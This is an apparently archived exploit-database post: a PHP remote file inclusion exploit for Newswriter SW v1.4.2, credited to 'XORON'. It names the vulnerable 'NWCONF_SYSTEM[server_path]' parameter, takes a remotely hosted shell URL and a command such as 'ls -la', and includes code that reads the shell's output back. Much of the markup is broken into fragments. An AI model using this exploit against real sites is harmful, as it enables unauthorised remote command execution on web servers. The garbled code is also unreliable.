Newswriter SW v1.4.2 Remote File Include Exploit :: XORON :: TURKISH HACKER ::" ."
" ."
" ."

script url: (ex. http://www.site.com/[script_path]/include/main.inc.php?NWCONF_SYSTEM[server_path]=)
" ."" ."
" ."shell url: (ex. http://www.site.com/[path]/shell.txt?) shell.txt (CHMOD 777)
" ."" ."
" ."cmd: (ex. ls -la)
" ."" ."
" ."" ."

" ."

Find by: XORON" ."
" ."

http://www.xoron.biz/

" ."

 

" ."
" ."

Special Greetz: Str0ke, Ironfist, Preddy, rgod ;-)
" ."
" ."

 

" ."
"; if (!isset($_POST['submit'])) { echo $exp; }else{ $file = fopen ("shell.txt", "w+"); fwrite($file, ''); fclose($file); $file = fopen ($shell, "r"); if (!$file) { echo "

Don't Find shell :( Insert in FTP shell.txt.\n"; exit; } echo $exp; while (!feof ($file)) { $line .= fgets ($file, 1024)."
"; } $tpos1 = strpos($line, "++BEGIN++"); $tpos2 = strpos($line, "++END++"); $tpos1 = $tpos1+strlen("++BEGIN++"); $tpos2 = $tpos2-$tpos1; $output = substr($line, $tpos1, $tpos2); } ?> # milw0rm.com [2006-09-27]